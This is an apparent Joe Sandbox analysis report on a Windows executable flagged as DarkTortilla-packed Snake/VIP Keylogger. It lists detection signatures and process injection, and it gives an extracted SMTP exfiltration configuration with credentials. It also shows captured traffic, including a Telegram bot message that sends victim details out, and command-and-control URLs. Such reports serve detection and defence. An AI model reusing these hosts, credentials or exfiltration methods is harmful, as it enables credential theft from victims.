Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5qJ6QQTcRS.exe

Overview

General Information

Sample name:5qJ6QQTcRS.exe
renamed because original name is a hash value
Original sample name:e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c.exe
Analysis ID:1588845
MD5:78668d52e5b092184a4b8e6788713b3c
SHA1:302e6b4b4f6441acbbfe4e55c6f6d8a83d94f7eb
SHA256:e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c
Tags:exeuser-adrian__luca
Infos:

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 5qJ6QQTcRS.exe (PID: 8140 cmdline: "C:\Users\user\Desktop\5qJ6QQTcRS.exe" MD5: 78668D52E5B092184A4B8E6788713B3C)
    • InstallUtil.exe (PID: 8132 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
    00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2daa0:$a1: get_encryptedPassword
          • 0x2e028:$a2: get_encryptedUsername
          • 0x2d713:$a3: get_timePasswordChanged
          • 0x2d82a:$a4: get_passwordField
          • 0x2dab6:$a5: set_encryptedPassword
          • 0x307d2:$a6: get_passwords
          • 0x30b66:$a7: get_logins
          • 0x307be:$a8: GetOutlookPasswords
          • 0x30177:$a9: StartKeylogger
          • 0x30abf:$a10: KeyLoggerEventArgs
          • 0x30217:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 22 entries
          SourceRuleDescriptionAuthorStrings
          0.2.5qJ6QQTcRS.exe.3b01960.0.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            0.2.5qJ6QQTcRS.exe.3ab6d70.2.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
              0.2.5qJ6QQTcRS.exe.5b60000.3.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                0.2.5qJ6QQTcRS.exe.5b60000.3.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  0.2.5qJ6QQTcRS.exe.3b01960.0.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                    Click to see the 21 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T06:14:35.817329+010028033053Unknown Traffic192.168.2.1049982104.21.112.1443TCP
                    2025-01-11T06:14:38.214770+010028033053Unknown Traffic192.168.2.1049986104.21.112.1443TCP
                    2025-01-11T06:14:40.599478+010028033053Unknown Traffic192.168.2.1049990104.21.112.1443TCP
                    2025-01-11T06:14:41.832235+010028033053Unknown Traffic192.168.2.1049992104.21.112.1443TCP
                    2025-01-11T06:14:44.289038+010028033053Unknown Traffic192.168.2.1049996104.21.112.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T06:14:34.400712+010028032742Potentially Bad Traffic192.168.2.1049980158.101.44.24280TCP
                    2025-01-11T06:14:35.291474+010028032742Potentially Bad Traffic192.168.2.1049980158.101.44.24280TCP
                    2025-01-11T06:14:36.463329+010028032742Potentially Bad Traffic192.168.2.1049983158.101.44.24280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T06:14:45.212528+010018100071Potentially Bad Traffic192.168.2.1049997149.154.167.220443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 5qJ6QQTcRS.exeAvira: detected
                    Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
                    Source: 5qJ6QQTcRS.exeReversingLabs: Detection: 75%
                    Source: 5qJ6QQTcRS.exeVirustotal: Detection: 67%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: 5qJ6QQTcRS.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: 5qJ6QQTcRS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49981 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2
                    Source: 5qJ6QQTcRS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00F8F8E9h4_2_00F8F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00F8FD41h4_2_00F8FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05628E28h4_2_05628B58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05627A5Dh4_2_05627720
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05620FF1h4_2_05620D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562C3D6h4_2_0562C108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 056218A1h4_2_056215F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05626869h4_2_056265C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05624471h4_2_056241C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05621449h4_2_056211A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562E856h4_2_0562E588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562C866h4_2_0562C598
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562DF36h4_2_0562DC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562BF46h4_2_0562BC78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 056202E9h4_2_05620040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 056262DBh4_2_05626030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov esp, ebp4_2_0562AC31
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 056232B1h4_2_05623008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05620B99h4_2_056208F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562E3C6h4_2_0562E0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05620741h4_2_05620498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562D616h4_2_0562D348
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05622A01h4_2_05622758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562B626h4_2_0562B358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 056255D1h4_2_05625328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562F606h4_2_0562F338
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 056225A9h4_2_05622300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562BAB6h4_2_0562B7E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562FA96h4_2_0562F7C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05625E81h4_2_05625BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562DAA6h4_2_0562D7D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05622E59h4_2_05622BB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05625A29h4_2_05625780
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05627119h4_2_05626E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05624D21h4_2_05624A78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05621CF9h4_2_05621A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 056248C9h4_2_05624620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562CCF6h4_2_0562CA28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05626CC1h4_2_05626A18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562ECE6h4_2_0562EA18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05627571h4_2_056272C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562B196h4_2_0562AEC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05625179h4_2_05624ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05622151h4_2_05621EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562F176h4_2_0562EEA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0562D186h4_2_0562CEB8

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49997 -> 149.154.167.220:443
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                    Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                    Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49980 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49983 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49996 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49986 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49990 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49992 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49982 -> 104.21.112.1:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49981 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 05:14:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
